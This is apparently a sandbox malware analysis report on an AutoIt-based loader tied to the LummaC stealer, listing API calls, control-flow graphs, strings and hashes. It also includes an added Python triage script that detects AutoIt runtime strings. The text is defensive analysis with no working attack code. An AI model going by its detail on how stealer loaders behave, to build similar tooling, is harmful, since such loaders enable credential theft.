                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                        • String ID: 0$3$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                        • API String ID: 683915450-107653589
                                                                                                                                                                        • Opcode ID: 3c8f2c3c29afab7d8374e401c3fc950da68729b221a6858cd406d94d6f8ccec5
                                                                                                                                                                        • Instruction ID: 133427d81a0092f3280557ae9b8bf670bfd0dc4f384b273943ea1fa22f52cd3e
                                                                                                                                                                        • Opcode Fuzzy Hash: 3c8f2c3c29afab7d8374e401c3fc950da68729b221a6858cd406d94d6f8ccec5
                                                                                                                                                                        • Instruction Fuzzy Hash: 6151F830118341AAC703FF61AC85DBFBBB9AF85754F00442DF582561A2DF648AE9DF62

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1741 2cdc54-2cdc9b call 26bf73 * 3 call 265851 call 2ceab0 1752 2cdc9d-2cdca6 call 266b7c 1741->1752 1753 2cdcab-2cdcdc call 26568e FindFirstFileW 1741->1753 1752->1753 1757 2cdcde-2cdce0 1753->1757 1758 2cdd4b-2cdd52 FindClose 1753->1758 1757->1758 1759 2cdce2-2cdce7 1757->1759 1760 2cdd56-2cdd78 call 26bd98 * 3 1758->1760 1761 2cdce9-2cdd24 call 26bed9 call 267bb5 call 266b7c DeleteFileW 1759->1761 1762 2cdd26-2cdd38 FindNextFileW 1759->1762 1761->1762 1776 2cdd42-2cdd49 FindClose 1761->1776 1762->1757 1765 2cdd3a-2cdd40 1762->1765 1765->1757 1776->1760
APIs
  • Part of subcall function 00265851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002655D1,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00265871
  • Part of subcall function 002CEAB0: GetFileAttributesW.KERNEL32(?,002CD840), ref: 002CEAB1
• FindFirstFileW.KERNEL32(?,?), ref: 002CDCCB
• DeleteFileW.KERNEL32(?,?,?,?), ref: 002CDD1B
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 002CDD2C
• FindClose.KERNEL32(00000000), ref: 002CDD43
• FindClose.KERNEL32(00000000), ref: 002CDD4C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: b8a35bdd5a9197fd906e7ddde6da0716e4db41eb24a969bbc6e978d96d766113
• Instruction ID: 4424f13c1958144cc16dc42494bf477995dec3ad390def25f78016e879c6b31c
• Opcode Fuzzy Hash: b8a35bdd5a9197fd906e7ddde6da0716e4db41eb24a969bbc6e978d96d766113
• Instruction Fuzzy Hash: C13181310283459FC305EF20D885DAFB7E8BE95314F404E6DF8D692192EB21DA59CBA3

APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 002CDDAC
• Process32FirstW.KERNEL32(00000000,?), ref: 002CDDBA
• Process32NextW.KERNEL32(00000000,?), ref: 002CDDDA
• CloseHandle.KERNEL32(00000000), ref: 002CDE87
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: aa7943be20adce158cffe4d61d98eef15d0a244ddca0ad56c79214067747ee96
• Instruction ID: 5387870e32282765526c7ee099f28df46b4a96494c1d7016f19c80c9afb34fe0
• Opcode Fuzzy Hash: aa7943be20adce158cffe4d61d98eef15d0a244ddca0ad56c79214067747ee96
• Instruction Fuzzy Hash: 7631BF710183019FC311EF60D885FAFBBE8AF99350F000A2DF585871A1EB719999CF92

Control-flow Graph (rendered interactively in the original report; the exported node list follows)

                                                                                                                                                                        control_flow_graph 0 27ac3e-27b063 call 268ec0 call 27bc58 call 26e6a0 7 27b069-27b073 0->7 8 2b8584-2b8591 0->8 11 2b896b-2b8979 7->11 12 27b079-27b07e 7->12 9 2b8593 8->9 10 2b8596-2b85a5 8->10 9->10 15 2b85aa 10->15 16 2b85a7 10->16 17 2b897b 11->17 18 2b897e 11->18 13 27b084-27b090 call 27b5b6 12->13 14 2b85b2-2b85b4 12->14 22 2b85bd 13->22 25 27b096-27b0a3 call 26c98d 13->25 14->22 15->14 16->15 17->18 20 2b8985-2b898e 18->20 23 2b8993 20->23 24 2b8990 20->24 27 2b85c7 22->27 28 2b899c-2b89eb call 26e6a0 call 27bbbe * 2 23->28 24->23 33 27b0ab-27b0b4 25->33 31 2b85cf-2b85d2 27->31 62 27b1e0-27b1f5 28->62 63 2b89f1-2b8a03 call 27b5b6 28->63 34 2b85d8-2b8600 call 284cd3 call 267ad5 31->34 35 27b158-27b16f 31->35 37 27b0b8-27b0d6 call 284d98 33->37 74 2b862d-2b8651 call 267b1a call 26bd98 34->74 75 2b8602-2b8606 34->75 40 27b175 35->40 41 2b8954-2b8957 35->41 56 27b0e5 37->56 57 27b0d8-27b0e1 37->57 45 2b88ff-2b8920 call 26e6a0 40->45 46 27b17b-27b17e 40->46 47 2b895d-2b8960 41->47 48 2b8a41-2b8a79 call 26e6a0 call 27bbbe 41->48 45->62 79 2b8926-2b8938 call 27b5b6 45->79 53 2b8729-2b8743 call 27bbbe 46->53 54 27b184-27b187 46->54 47->28 55 2b8962-2b8965 47->55 48->62 106 2b8a7f-2b8a91 call 27b5b6 48->106 83 2b8749-2b874c 53->83 84 2b888f-2b88b5 call 26e6a0 53->84 64 2b86ca-2b86e0 call 266c03 54->64 65 27b18d-27b190 54->65 55->11 55->62 56->27 68 27b0eb-27b0fc 56->68 57->37 66 27b0e3 57->66 69 2b8ac9-2b8acf 62->69 70 27b1fb-27b20b call 26e6a0 62->70 97 2b8a2f-2b8a3c call 26c98d 63->97 98 2b8a05-2b8a0d 63->98 64->62 95 2b86e6-2b86fc call 27b5b6 64->95 77 27b196-27b1b8 call 26e6a0 65->77 78 2b8656-2b8659 65->78 66->68 68->11 80 27b102-27b11c 68->80 69->33 86 2b8ad5 69->86 74->78 75->74 88 2b8608-2b862b call 26ad40 75->88 77->62 114 27b1ba-27b1cc call 27b5b6 77->114 78->11 81 2b865f-2b8674 call 266c03 
78->81 117 2b893a-2b8943 call 26c98d 79->117 118 2b8945 79->118 80->31 93 27b122-27b154 call 27bbbe call 26e6a0 80->93 81->62 136 2b867a-2b8690 call 27b5b6 81->136 104 2b87bf-2b87de call 26e6a0 83->104 105 2b874e-2b8751 83->105 84->62 139 2b88bb-2b88cd call 27b5b6 84->139 86->11 88->74 88->75 93->35 142 2b86fe-2b870b call 268ec0 95->142 143 2b870d-2b8716 call 268ec0 95->143 149 2b8ac2-2b8ac4 97->149 112 2b8a0f-2b8a13 98->112 113 2b8a1e-2b8a29 call 26b4b1 98->113 104->62 141 2b87e4-2b87f6 call 27b5b6 104->141 120 2b8ada-2b8ae8 105->120 121 2b8757-2b8774 call 26e6a0 105->121 153 2b8a93-2b8a9b 106->153 154 2b8ab5-2b8abe call 26c98d 106->154 112->113 129 2b8a15-2b8a19 112->129 113->97 160 2b8b0b-2b8b19 113->160 161 2b86ba-2b86c3 call 26c98d 114->161 162 27b1d2-27b1de 114->162 135 2b8949-2b894f 117->135 118->135 127 2b8aea 120->127 128 2b8aed-2b8afd 120->128 121->62 164 2b877a-2b878c call 27b5b6 121->164 127->128 144 2b8aff 128->144 145 2b8b02-2b8b06 128->145 146 2b8aa1-2b8aa3 129->146 135->62 174 2b869d-2b86ab call 268ec0 136->174 175 2b8692-2b869b call 26c98d 136->175 179 2b88cf-2b88dc call 26c98d 139->179 180 2b88de 139->180 141->62 184 2b87fc-2b8805 call 27b5b6 141->184 185 2b8719-2b8724 call 268577 142->185 143->185 144->145 145->70 146->62 149->62 165 2b8aa8-2b8ab3 call 26b4b1 153->165 166 2b8a9d 153->166 154->149 171 2b8b1b 160->171 172 2b8b1e-2b8b21 160->172 161->64 162->62 197 2b879f 164->197 198 2b878e-2b879d call 26c98d 164->198 165->154 165->160 166->146 171->172 172->20 204 2b86ae-2b86b5 174->204 175->204 183 2b88e2-2b88e9 179->183 180->183 191 2b88eb-2b88f0 call 26396b 183->191 192 2b88f5 call 263907 183->192 209 2b8818 184->209 210 2b8807-2b8816 call 26c98d 184->210 185->62 191->62 208 2b88fa 192->208 199 2b87a3-2b87ae call 289334 197->199 198->199 199->11 215 2b87b4-2b87ba 199->215 204->62 208->62 214 2b881c-2b883f 209->214 210->214 217 2b884d-2b8850 214->217 218 2b8841-2b8848 214->218 215->62 219 2b8852-2b885b 217->219 220 2b8860-2b8863 217->220 
218->217 219->220 221 2b8873-2b8876 220->221 222 2b8865-2b886e 220->222 221->62 223 2b887c-2b888a 221->223 222->221 223->62
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4/$@/$P/$`*3$`/$d0b$d10m0$d1b$d1r0,2$d5m0$e#3$i$t/$t/$(3$(3$(3$(3$/$/
                                                                                                                                                                        • API String ID: 0-1403865987
                                                                                                                                                                        • Opcode ID: f7c29095bd38971fc55a144cf1247b1d62013a1bd5d1b8693a822e5182c4d844
                                                                                                                                                                        • Instruction ID: 7ea1822b4d1c7b936cdf47899941e023e9de625436d7abeddbe2bb4343950eab
                                                                                                                                                                        • Opcode Fuzzy Hash: f7c29095bd38971fc55a144cf1247b1d62013a1bd5d1b8693a822e5182c4d844
                                                                                                                                                                        • Instruction Fuzzy Hash: E36257745283468FC725DF14C084AAAFBE5BF88348F10896EE59D8B361DB70D965CF82

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00263657
• RegisterClassExW.USER32(00000030), ref: 00263681
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00263692
• InitCommonControlsEx.COMCTL32(?), ref: 002636AF
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002636BF
• LoadIconW.USER32(000000A9), ref: 002636D5
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002636E4
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$0+m"&$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1735067768
• Opcode ID: 52956786c0878750b702df2b905300672505bd3b23770cf49ce9b7f3d67f788c
• Instruction ID: 131699fff939661b2c2dd89d38f6abdfdad45b9f5db330033ac9d5a09bc139d9
• Opcode Fuzzy Hash: 52956786c0878750b702df2b905300672505bd3b23770cf49ce9b7f3d67f788c
• Instruction Fuzzy Hash: 7E21F7B5D11308AFDB01DF94EC89BAEBBB9FB08760F10412AF611A62A0D7B44554CF94

Control-flow Graph

[Graph image not reproduced. Legend: Executed / Not Executed. Basic blocks 26370f-26381d and 2a3d95-2a3e7b; blocks that call APIs: 26376f DefWindowProcW, 2637a0 KillTimer, 2637bc SetTimer and RegisterWindowMessageW, 2637e5 CreatePopupMenu, 263804 PostQuitMessage, 2a3dbf SetFocus, 2a3dd0 MoveWindow.]
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00263709,?,?), ref: 00263777
• KillTimer.USER32(?,00000001,?,?,?,?,?,00263709,?,?), ref: 002637A3
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002637C6
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00263709,?,?), ref: 002637D1
• CreatePopupMenu.USER32 ref: 002637E5
• PostQuitMessage.USER32(00000000), ref: 00263806
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: 0$3$0$3$TaskbarCreated
• API String ID: 129472671-1062755802
• Opcode ID: 47cf0d306d270748715239951e395e247d4ad25c31890d9cf29ecda19ce8af50
• Instruction ID: 1e9bc3aee808aa88fcb71a1a970bb683e13e6487c7ecb9b66bab9b493eca2057
• Opcode Fuzzy Hash: 47cf0d306d270748715239951e395e247d4ad25c31890d9cf29ecda19ce8af50
• Instruction Fuzzy Hash: F54108F4134146BBDB17EF389C8DBBABAA9EB06310F104125F5028A191CBB59BB4D761

Control-flow Graph

[Graph image not reproduced. Legend: Executed / Not Executed. Basic blocks 2a09db-2a0d03; blocks that call APIs: 2a0ad6 GetLastError, 2a0b01 GetFileType, 2a0b0c GetLastError and CloseHandle, 2a0c7c CloseHandle, 2a0cb1 GetLastError.]
APIs
  • Part of subcall function 002A071A: CreateFileW.KERNEL32(00000000,00000000,?,002A0A84,?,?,00000000,?,002A0A84,00000000,0000000C), ref: 002A0737
• GetLastError.KERNEL32 ref: 002A0AEF
• __dosmaperr.LIBCMT ref: 002A0AF6
• GetFileType.KERNEL32(00000000), ref: 002A0B02
• GetLastError.KERNEL32 ref: 002A0B0C
• __dosmaperr.LIBCMT ref: 002A0B15
• CloseHandle.KERNEL32(00000000), ref: 002A0B35
• CloseHandle.KERNEL32(?), ref: 002A0C7F
• GetLastError.KERNEL32 ref: 002A0CB1
• __dosmaperr.LIBCMT ref: 002A0CB8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 3c654fd0e132f83fe28074b31788e36bd78702f45a7f97b75ed77c132a9e7931
• Instruction ID: aac4e4de66ee72c5a492788a2cd06b68b627797efffafd6453edfa79a63c23b5
• Opcode Fuzzy Hash: 3c654fd0e132f83fe28074b31788e36bd78702f45a7f97b75ed77c132a9e7931
• Instruction Fuzzy Hash: 42A11832A241158FDF19AF68DC91BAD7BA5EB07324F140259F811DB2E2DB319D22CF61

Control-flow Graph

APIs
  • Part of subcall function 00265594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 002655B2
  • Part of subcall function 00265238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0026525A
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002653C4
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002A4BFD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002A4C3E
• RegCloseKey.ADVAPI32(?), ref: 002A4C80
• _wcslen.LIBCMT ref: 002A4CE7
• _wcslen.LIBCMT ref: 002A4CF6
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
• Opcode ID: 8c6ef64c0c0e93944012ced3f8fdd8f2609ae232720e1eb9633785d6427e3614
• Instruction ID: 53dca3594448e76d33be5033c22c4ac9ad0f5f75d237f0e0a08952242ed3e4c3
• Opcode Fuzzy Hash: 8c6ef64c0c0e93944012ced3f8fdd8f2609ae232720e1eb9633785d6427e3614
• Instruction Fuzzy Hash: 96718D755253019BC306EF65E8859AABBECFF89350F80842EF445871A0DF719AA8CF51
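Two of the string listings above are worth more than their fuzzy hashes: the window class "AutoIt v3 GUI" registered at 00263681 and the key Software\AutoIt v3\AutoIt opened at 002653C4 (with its Include value and the \Include\ suffix) are strings of the AutoIt v3 runtime, so this process 11 image is an AutoIt-compiled stub rather than native LummaC code. The Python script below is an added triage check, not part of the Joe Sandbox report or of any AutoIt tooling: it pulls ASCII and UTF-16LE strings out of a file or memory dump and reports which of those indicators are present. The report calls the APIs through their W variants (RegisterClassExW, RegOpenKeyExW), so the indicators are expected in UTF-16LE, which is why both encodings are scanned. The indicator table is taken from the String ID fields above; the embedded sample blob is constructed for this example, and the file path argument is an assumption.

```python
"""Triage check: does a PE file or memory dump carry AutoIt v3 runtime strings?

Added example, not Joe Sandbox code. The indicator strings come from the
report's String ID fields; everything else here is constructed.
"""
import re
import sys

# Indicator strings from the report; comments say where the report shows each used.
AUTOIT_INDICATORS = {
    "AutoIt v3 GUI": "window class name passed to RegisterClassExW",
    "Software\\AutoIt v3\\AutoIt": "registry key opened with RegOpenKeyExW",
    "\\Include\\": "suffix appended to the Include registry value",
}

# Printable runs of at least five characters, narrow (ASCII) and wide (UTF-16LE).
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{5,}")
_WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){5,}")


def extract_strings(blob: bytes):
    """Return (ascii_strings, utf16le_strings) found in blob, in file order."""
    ascii_strings = [m.group().decode("ascii") for m in _ASCII_RUN.finditer(blob)]
    wide_strings = [m.group().decode("utf-16-le") for m in _WIDE_RUN.finditer(blob)]
    return ascii_strings, wide_strings


def find_autoit_indicators(blob: bytes):
    """Map each indicator present in blob to the encodings it was found in."""
    ascii_strings, wide_strings = extract_strings(blob)
    hits = {}
    for needle in AUTOIT_INDICATORS:
        found = []
        if any(needle in s for s in ascii_strings):
            found.append("ascii")
        if any(needle in s for s in wide_strings):
            found.append("utf-16le")
        if found:
            hits[needle] = found
    return hits


def looks_like_autoit(blob: bytes) -> bool:
    """True when the class name or the registry key is present.

    "\\Include\\" on its own is too generic to count; it only adds context.
    """
    hits = find_autoit_indicators(blob)
    return "AutoIt v3 GUI" in hits or "Software\\AutoIt v3\\AutoIt" in hits


# Constructed sample blob (not bytes from the real sample): two wide-string
# indicators between filler bytes, plus "TaskbarCreated" as an ASCII decoy.
# TaskbarCreated is a generic shell message name that many tray applications
# register, so it is deliberately not in the indicator list.
SAMPLE_BLOB = (
    b"\x55\x8b\xec\x83\xec\x10"
    + "AutoIt v3 GUI".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 8
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"
    + b"TaskbarCreated\x00"
    + b"\xc3"
)


def main(argv):
    # The path argument is assumed; without one, the constructed blob is scanned.
    data = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE_BLOB
    hits = find_autoit_indicators(data)
    for needle, encodings in hits.items():
        print(f"{needle!r:32} {','.join(encodings):14} {AUTOIT_INDICATORS[needle]}")
    verdict = "AutoIt v3 runtime strings present" if looks_like_autoit(data) else "no AutoIt v3 runtime strings"
    print("verdict:", verdict)
    return 0 if hits else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against the memory dump the report names under Memory Dump Source rather than against the file on disk: if the on-disk stub is packed, the runtime strings only appear after it has unpacked itself, and a clean result on the packed file proves nothing. A positive result says only that the AutoIt interpreter is present; the embedded script, and the LummaC payload it leads to, still has to be extracted separately.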

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 002634DE
• LoadCursorW.USER32(00000000,00007F00), ref: 002634ED
• LoadIconW.USER32(00000063), ref: 00263503
• LoadIconW.USER32(000000A4), ref: 00263515
• LoadIconW.USER32(000000A2), ref: 00263527
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0026353F
• RegisterClassExW.USER32(?), ref: 00263590
  • Part of subcall function 00263624: GetSysColorBrush.USER32(0000000F), ref: 00263657
  • Part of subcall function 00263624: RegisterClassExW.USER32(00000030), ref: 00263681
  • Part of subcall function 00263624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00263692
  • Part of subcall function 00263624: InitCommonControlsEx.COMCTL32(?), ref: 002636AF
  • Part of subcall function 00263624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002636BF
  • Part of subcall function 00263624: LoadIconW.USER32(000000A9), ref: 002636D5
  • Part of subcall function 00263624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002636E4
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                                        • API String ID: 423443420-4155596026

Control-flow Graph
APIs
• WSAStartup.WS2_32(00000101,?), ref: 002E1019
• inet_addr.WSOCK32(?), ref: 002E1079
• gethostbyname.WS2_32(?), ref: 002E1085
• IcmpCreateFile.IPHLPAPI ref: 002E1093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002E1123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002E1142
• IcmpCloseHandle.IPHLPAPI(?), ref: 002E1216
• WSACleanup.WSOCK32 ref: 002E121C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.$t53$t53$t53$t53$t53t53
• API String ID: 0-3522271721
APIs
• __Init_thread_footer.LIBCMT ref: 002715F2
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
